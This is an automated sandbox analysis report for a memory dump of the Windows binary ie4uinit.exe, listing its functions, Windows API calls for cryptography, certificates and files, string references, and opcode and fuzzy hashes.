String ID: Locale$Software\Clients\StartMenuInternet$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}$Version$shell:::{871C5380-42A0-1069-A2EA-08002B30309D}
API String ID: 3651604014-1396794569
Opcode ID: b2999dfcf064b39e6c9b9b5fe91f97da1f9eb3d234a2c6913081498dbea14266
Instruction ID: e1d1e72860af9c17bccff1fa68529c09409b2f23024c79680afb927ffba73a3b
Opcode Fuzzy Hash: b2999dfcf064b39e6c9b9b5fe91f97da1f9eb3d234a2c6913081498dbea14266
Instruction Fuzzy Hash: 3471A021B0A66245F7209B2ADE416FA2660BF94F94F501035DF0D93A9BCE3EAD06CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522F108 Relevance: 21.2, APIs: 14, Instructions: 164encryptionCOMMON

Download Yara Rule

APIs

CryptSetKeyParam.ADVAPI32(00000000,00007FF6B522EEAD), ref: 00007FF6B522F138
memcpy_s.MSVCRT ref: 00007FF6B522F18C
CryptEncrypt.ADVAPI32 ref: 00007FF6B522F1DA
memcpy_s.MSVCRT ref: 00007FF6B522F215
CryptEncrypt.ADVAPI32 ref: 00007FF6B522F241
GetLastError.KERNEL32 ref: 00007FF6B522F25A
GetLastError.KERNEL32 ref: 00007FF6B522F26E
GetLastError.KERNEL32 ref: 00007FF6B522F27D
GetLastError.KERNEL32 ref: 00007FF6B522F2A9
GetLastError.KERNEL32 ref: 00007FF6B522F2B8
GetLastError.KERNEL32 ref: 00007FF6B522F2C7
GetLastError.KERNEL32 ref: 00007FF6B522F2FE
GetLastError.KERNEL32 ref: 00007FF6B522F30D
GetLastError.KERNEL32 ref: 00007FF6B522F31C

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Crypt$Encryptmemcpy_s$Param
String ID:
API String ID: 2866623800-0
Opcode ID: 08f6b4490a9e2db9937eaeb6c40603659467061f2b73c9a0b52fbdd1839e3ee7
Instruction ID: 277b618d07b62a73e06954a649262251db1e6e827c096d068504c603df01825d
Opcode Fuzzy Hash: 08f6b4490a9e2db9937eaeb6c40603659467061f2b73c9a0b52fbdd1839e3ee7
Instruction Fuzzy Hash: C251D466B1A7868AF7608F6A9E857BA7294BF84F80F440134CF49C3649DF3DEC058B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521AC08 Relevance: 16.6, APIs: 11, Instructions: 138fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF6B521AC70
#149.IERTUTIL ref: 00007FF6B521ACD3
CloseHandle.KERNEL32 ref: 00007FF6B521ACFB
GetLastError.KERNEL32 ref: 00007FF6B521AD03
wcscpy_s.MSVCRT ref: 00007FF6B521AD3B
wcscat_s.MSVCRT ref: 00007FF6B521AD51
FindFirstFileW.KERNEL32 ref: 00007FF6B521AD63
wcscat_s.MSVCRT ref: 00007FF6B521ADBB
FindNextFileW.KERNEL32 ref: 00007FF6B521ADF2
FindClose.KERNEL32 ref: 00007FF6B521AE01
GetLastError.KERNEL32 ref: 00007FF6B521AE09

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: FileFind$CloseErrorLastwcscat_s$#149CreateFirstHandleNextwcscpy_s
String ID:
API String ID: 2239470773-0
Opcode ID: 113ee59415ec5d1752b21dd8af03456097b5f148b9c7ab2f31cca24d4a06286a
Instruction ID: 80e68fc1e704e6f5615417177eef52689663c2ca6249afddeecbc96b8dbd7ba2
Opcode Fuzzy Hash: 113ee59415ec5d1752b21dd8af03456097b5f148b9c7ab2f31cca24d4a06286a
Instruction Fuzzy Hash: 3951DB32B097928AF7209B69EA403EA73A4FB84B94F100135DB4D87A9DDF7DE945C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522EA9C Relevance: 16.6, APIs: 11, Instructions: 85encryptionCOMMON

Download Yara Rule

APIs

memcpy_s.MSVCRT ref: 00007FF6B522EADF
CryptCreateHash.ADVAPI32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EAFE
CryptHashData.ADVAPI32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB1B
CryptDeriveKey.ADVAPI32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB3E
GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB48
GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB5C
GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB6B
CryptDestroyHash.ADVAPI32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB84
GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB8C
GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EBA0
GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EBAF

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Crypt$Hash$CreateDataDeriveDestroymemcpy_s
String ID:
API String ID: 628050030-0
Opcode ID: 9021930f96504eeb5296fca52d21bf6ec67dc97231a112445ffaed2aa9fb0bbd
Instruction ID: 69b4494f5c960984dc7d8f9a5e1e7547fb69df2561353eac8890a52dc067cfc1
Opcode Fuzzy Hash: 9021930f96504eeb5296fca52d21bf6ec67dc97231a112445ffaed2aa9fb0bbd
Instruction Fuzzy Hash: 0131B821B09B428AF7205B6AAE846BA73A4FF88F80F440035DB4EC3619DF3DEC459710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5219A98 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6B5219AD7
HeapAlloc.KERNEL32 ref: 00007FF6B5219AE9
CloseHandle.KERNEL32 ref: 00007FF6B5219C86
CloseHandle.KERNEL32 ref: 00007FF6B5219C98
GetProcessHeap.KERNEL32 ref: 00007FF6B5219CA7
HeapFree.KERNEL32 ref: 00007FF6B5219CB5

Strings

_p0, xrefs: 00007FF6B5219B4B
wil, xrefs: 00007FF6B5219AFE, 00007FF6B5219B99, 00007FF6B5219BF5

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$CloseHandleProcess$AllocFree
String ID: _p0$wil
API String ID: 826427307-1814513734
Opcode ID: 41d6ffa8385c61e86ba7f5e3266a8a2509f3cd1dee9d41ce3d8820455ddc22be
Instruction ID: 6a7f44289d25732e7e9476d2dc6e80e298b32a9876b926fef5d31a597dcde638
Opcode Fuzzy Hash: 41d6ffa8385c61e86ba7f5e3266a8a2509f3cd1dee9d41ce3d8820455ddc22be
Instruction Fuzzy Hash: 72615032A1AA5286E720DB29DD417EA63A4FB88F80F544031DB4D87B5ADF3DD946C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52133A8 Relevance: 15.1, APIs: 10, Instructions: 104fileCOMMON

Download Yara Rule

APIs

#654.IERTUTIL ref: 00007FF6B52133FF
FindResourceW.KERNEL32 ref: 00007FF6B521340F
LoadResource.KERNEL32 ref: 00007FF6B5213426
LockResource.KERNEL32 ref: 00007FF6B5213438

Part of subcall function 00007FF6B5216B2C: #650.IERTUTIL ref: 00007FF6B5216B4F

Part of subcall function 00007FF6B52167D8: #650.IERTUTIL ref: 00007FF6B521681F

wcsrchr.MSVCRT ref: 00007FF6B52134C1
SHCreateDirectory.SHELL32 ref: 00007FF6B52134DA
CreateFileW.KERNEL32 ref: 00007FF6B5213509
SizeofResource.KERNEL32 ref: 00007FF6B521351D
WriteFile.KERNEL32 ref: 00007FF6B521353B
CloseHandle.KERNEL32 ref: 00007FF6B5213544

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Resource$#650CreateFile$#654CloseDirectoryFindHandleLoadLockSizeofWritewcsrchr
String ID:
API String ID: 3992202063-0
Opcode ID: 428148b18bb479405bdf88b632c14fddec18c450d94b75b39078339c1fde7bf5
Instruction ID: 2e3b37a0069bf0680cfcb12735b1ca296167931ab45909bc07516262e5e24b71
Opcode Fuzzy Hash: 428148b18bb479405bdf88b632c14fddec18c450d94b75b39078339c1fde7bf5
Instruction Fuzzy Hash: 7B41C53260AB4286EB20CF19EA545AA73A5FB88F90F404135DF4D57B59DF3DE90ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5227AC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97encryptionCOMMON

Download Yara Rule

APIs

CertOpenStore.CRYPT32 ref: 00007FF6B5227B2F
CertFindCertificateInStore.CRYPT32 ref: 00007FF6B5227B5C
GetLastError.KERNEL32 ref: 00007FF6B5227BC6

Part of subcall function 00007FF6B522780C: CertGetIntendedKeyUsage.CRYPT32 ref: 00007FF6B5227842
Part of subcall function 00007FF6B522780C: CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF6B5227871
Part of subcall function 00007FF6B522780C: CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF6B5227899
Part of subcall function 00007FF6B522780C: StrCmpNA.SHLWAPI ref: 00007FF6B52278D1
Part of subcall function 00007FF6B522780C: StrCmpNW.SHLWAPI(?,?,00000000,00000000,?,00007FF6B5227A0D), ref: 00007FF6B522793D

Part of subcall function 00007FF6B5227C38: memset.MSVCRT ref: 00007FF6B5227C73
Part of subcall function 00007FF6B5227C38: CertGetCertificateChain.CRYPT32 ref: 00007FF6B5227CAA
Part of subcall function 00007FF6B5227C38: CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF6B5227D0B
Part of subcall function 00007FF6B5227C38: CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF6B5227D38
Part of subcall function 00007FF6B5227C38: CertFreeCertificateChain.CRYPT32 ref: 00007FF6B5227D8C

CryptImportPublicKeyInfo.CRYPT32 ref: 00007FF6B5227BAF
GetLastError.KERNEL32 ref: 00007FF6B5227BE8
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B5227C04
CertCloseStore.CRYPT32 ref: 00007FF6B5227C14

Strings

Trust, xrefs: 00007FF6B5227B13

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Cert$Certificate$Chain$StoreUsage$EnhancedErrorFreeLastPolicyVerify$CloseContextCryptFindImportInfoIntendedOpenPublicmemset
String ID: Trust
API String ID: 1059425161-3418866602
Opcode ID: d2ee9b44ad53f75079dd3a31972df50917533427fd6d1c161ed58a75a08a27d8
Instruction ID: 4134d952325ab6953d28e993726c9eb5e4ce31b4409faad8852baddede500dcf
Opcode Fuzzy Hash: d2ee9b44ad53f75079dd3a31972df50917533427fd6d1c161ed58a75a08a27d8
Instruction Fuzzy Hash: B7415F36B1EB4286EB119B1A9E447A962A4BF44F80F448134DF4CC775AEF7DE8558B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521481C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B5214851

Part of subcall function 00007FF6B52190F4: LocalFree.KERNEL32 ref: 00007FF6B5219312

Part of subcall function 00007FF6B5214244: SHCreateDirectory.SHELL32 ref: 00007FF6B5214301
Part of subcall function 00007FF6B5214244: PathFileExistsW.SHLWAPI ref: 00007FF6B5214356

GetModuleHandleW.KERNEL32 ref: 00007FF6B5214898
LoadStringW.USER32 ref: 00007FF6B52148AE
PathRemoveExtensionW.SHLWAPI ref: 00007FF6B52148B9
GetModuleHandleW.KERNEL32 ref: 00007FF6B52148F1
LoadStringW.USER32 ref: 00007FF6B5214907
PathRemoveExtensionW.SHLWAPI ref: 00007FF6B5214912

Part of subcall function 00007FF6B52190F4: LocalAlloc.KERNEL32 ref: 00007FF6B52191BE

Strings

Internet Explorer, xrefs: 00007FF6B5214864

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Path$ExtensionHandleLoadLocalModuleRemoveString$AllocCreateDirectoryExistsFileFolderFreeSpecial
String ID: Internet Explorer
API String ID: 715972500-1412615936
Opcode ID: 1b0beab515720545fd0eb81da0df046551aa5ce0d68455647aaa891b8692ddaa
Instruction ID: eb3ba37c21d895e06e7eccb77819bc29c8f7b34b5cff0f374bf7ded8b0edb55f
Opcode Fuzzy Hash: 1b0beab515720545fd0eb81da0df046551aa5ce0d68455647aaa891b8692ddaa
Instruction Fuzzy Hash: BC31723261598286E730EF38ED55BEA2361FF94B48F801032DB0E9796DDE39DA09C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522ED98 Relevance: 13.6, APIs: 9, Instructions: 145encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

memcpy_s.MSVCRT ref: 00007FF6B522EE10
memcpy_s.MSVCRT ref: 00007FF6B522EE29
CryptGenRandom.ADVAPI32 ref: 00007FF6B522EE45
memcpy_s.MSVCRT ref: 00007FF6B522EE63
EnterCriticalSection.KERNEL32 ref: 00007FF6B522EE7D
LeaveCriticalSection.KERNEL32 ref: 00007FF6B522EEEA
GetLastError.KERNEL32 ref: 00007FF6B522EF30
GetLastError.KERNEL32 ref: 00007FF6B522EF44
GetLastError.KERNEL32 ref: 00007FF6B522EF53

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLastmemcpy_s$CriticalSection$CryptEnterHeapLeaveProcessRandom
String ID:
API String ID: 2737344278-0
Opcode ID: c20fa271f65cf2aa6819efbf1ba4857f7df93e4172a13f99332462aaabf75c36
Instruction ID: a7f023e305b2432fd9884c2e9dab7b335d851e4ae03b0b7bba2b59ea680212e8
Opcode Fuzzy Hash: c20fa271f65cf2aa6819efbf1ba4857f7df93e4172a13f99332462aaabf75c36
Instruction Fuzzy Hash: 55519325B1A7868AEB509F29AE406FA27A0FB48F84F440035EF4DC775ADE3DE8459740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522E950 Relevance: 13.6, APIs: 9, Instructions: 92encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B522F73C: CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6B522F76A
Part of subcall function 00007FF6B522F73C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B522E986,?,?,00007FF6B522E79F), ref: 00007FF6B522F778
Part of subcall function 00007FF6B522F73C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B522E986,?,?,00007FF6B522E79F), ref: 00007FF6B522F78C
Part of subcall function 00007FF6B522F73C: CertCloseStore.CRYPT32 ref: 00007FF6B522F7B6

CryptGetKeyParam.ADVAPI32(?,?,00007FF6B522E79F), ref: 00007FF6B522EA39

Part of subcall function 00007FF6B522F7CC: CertGetCertificateContextProperty.CRYPT32 ref: 00007FF6B522F7FC
Part of subcall function 00007FF6B522F7CC: CertGetCertificateContextProperty.CRYPT32 ref: 00007FF6B522F821

CryptImportPublicKeyInfo.CRYPT32 ref: 00007FF6B522E9C3
GetLastError.KERNEL32(?,?,00007FF6B522E79F), ref: 00007FF6B522E9D8
GetLastError.KERNEL32(?,?,00007FF6B522E79F), ref: 00007FF6B522E9E8
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B522EA10
GetLastError.KERNEL32(?,?,00007FF6B522E79F), ref: 00007FF6B522EA49
GetLastError.KERNEL32(?,?,00007FF6B522E79F), ref: 00007FF6B522EA59
GetLastError.KERNEL32(?,?,00007FF6B522E79F), ref: 00007FF6B522EA69

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Cert$CertificateContext$CryptPropertyStore$CertificatesCloseEnumFreeImportInfoParamPublic
String ID:
API String ID: 506061795-0
Opcode ID: 2775827cc976ad45cae2bac6d5be6874044f2555a188ede1d5e4ecd2066bf15f
Instruction ID: f3a2536b10d764a57cad0b9326cba0044ba36a17ec42d6013d7c0d3a9d812076
Opcode Fuzzy Hash: 2775827cc976ad45cae2bac6d5be6874044f2555a188ede1d5e4ecd2066bf15f
Instruction Fuzzy Hash: E0317F26B15B468AE7209B6ADA843BA73A4FF48F44F440035CB49C766ADF7DF846D300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521C92C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 212memorywindowCOMMON

Download Yara Rule

APIs

SHStrDupW.SHLWAPI ref: 00007FF6B521C9DD
PostMessageW.USER32 ref: 00007FF6B521C9F7
CoTaskMemFree.OLE32 ref: 00007FF6B521CA06
SysAllocString.OLEAUT32 ref: 00007FF6B521CAD1
VarBstrCmp.OLEAUT32 ref: 00007FF6B521CAF3
SysFreeString.OLEAUT32 ref: 00007FF6B521CAFE

Strings

searchscope, xrefs: 00007FF6B521C9D6

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: FreeString$AllocBstrMessagePostTask
String ID: searchscope
API String ID: 3622073155-110112929
Opcode ID: 37f70af6f447b2250a3a87e0daa853a576a026bf5d156e6f44af05d9dc9db48b
Instruction ID: 3d6c36c03922b15e0b735bb98f42ff130c21df314c576b5089dd1f3c9f91f938
Opcode Fuzzy Hash: 37f70af6f447b2250a3a87e0daa853a576a026bf5d156e6f44af05d9dc9db48b
Instruction Fuzzy Hash: B8817229A1A65246EA659F2AEB501BB6760BF45F84F044031DF4ED7B9FCE3EED058300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522544C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106encryptionstringCOMMON

Download Yara Rule

APIs

strnlen.MSVCRT ref: 00007FF6B5225493
isalnum.MSVCRT ref: 00007FF6B52254BA
CryptStringToBinaryA.CRYPT32 ref: 00007FF6B522550E
CryptStringToBinaryA.CRYPT32 ref: 00007FF6B522554F
GetLastError.KERNEL32 ref: 00007FF6B5225559
GetLastError.KERNEL32 ref: 00007FF6B522558D

Strings

thumbprint, xrefs: 00007FF6B5225456

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: BinaryCryptErrorLastString$isalnumstrnlen
String ID: thumbprint
API String ID: 3213271566-1670052307
Opcode ID: 6baa1e2f041215ea4219d63a9758e832fd4e1e74504ae30f35ad77c70d18b645
Instruction ID: bd7d7a49ea1bd628560a9f0f896b50d9920da5f15224641812c33b0e217da23a
Opcode Fuzzy Hash: 6baa1e2f041215ea4219d63a9758e832fd4e1e74504ae30f35ad77c70d18b645
Instruction Fuzzy Hash: FE412325B2A7028AE7208F19AE443B97295BF44F90F148139EF4DCB75ADE3EEC558700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52273D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32 ref: 00007FF6B522741F
CryptHashData.ADVAPI32 ref: 00007FF6B5227437
CryptGetHashParam.ADVAPI32 ref: 00007FF6B5227460
GetLastError.KERNEL32 ref: 00007FF6B522746E
CryptDestroyHash.ADVAPI32 ref: 00007FF6B5227487
GetLastError.KERNEL32 ref: 00007FF6B522748F

Strings

, xrefs: 00007FF6B5227458

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CryptHash$ErrorLast$CreateDataDestroyParam
String ID:
API String ID: 3383248918-3916222277
Opcode ID: 0f67868ec17e50d632dcbf79ea9a6bc02ab3efe34627aef37dbc41d5231ad76d
Instruction ID: f60b23281b17a98a2dfb72c4fa5be9b78fba7c6a08e3588d6e1262533813ee15
Opcode Fuzzy Hash: 0f67868ec17e50d632dcbf79ea9a6bc02ab3efe34627aef37dbc41d5231ad76d
Instruction Fuzzy Hash: 1121B021F2874286EB608B69AE847AA77A4FB44F84F544034DB4DC7A49DE7DEC01CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52274BC Relevance: 12.1, APIs: 8, Instructions: 94encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32 ref: 00007FF6B5227527
CryptSetHashParam.ADVAPI32 ref: 00007FF6B5227544
CryptVerifySignatureW.ADVAPI32 ref: 00007FF6B52275A3
GetLastError.KERNEL32 ref: 00007FF6B52275B3
CryptDestroyKey.ADVAPI32 ref: 00007FF6B52275CC
GetLastError.KERNEL32 ref: 00007FF6B52275E7
CryptDestroyHash.ADVAPI32 ref: 00007FF6B5227600

Part of subcall function 00007FF6B5227AC8: CertOpenStore.CRYPT32 ref: 00007FF6B5227B2F
Part of subcall function 00007FF6B5227AC8: CertFindCertificateInStore.CRYPT32 ref: 00007FF6B5227B5C
Part of subcall function 00007FF6B5227AC8: CryptImportPublicKeyInfo.CRYPT32 ref: 00007FF6B5227BAF
Part of subcall function 00007FF6B5227AC8: CertFreeCertificateContext.CRYPT32 ref: 00007FF6B5227C04
Part of subcall function 00007FF6B5227AC8: CertCloseStore.CRYPT32 ref: 00007FF6B5227C14

GetLastError.KERNEL32 ref: 00007FF6B5227608

Memory Dump Source

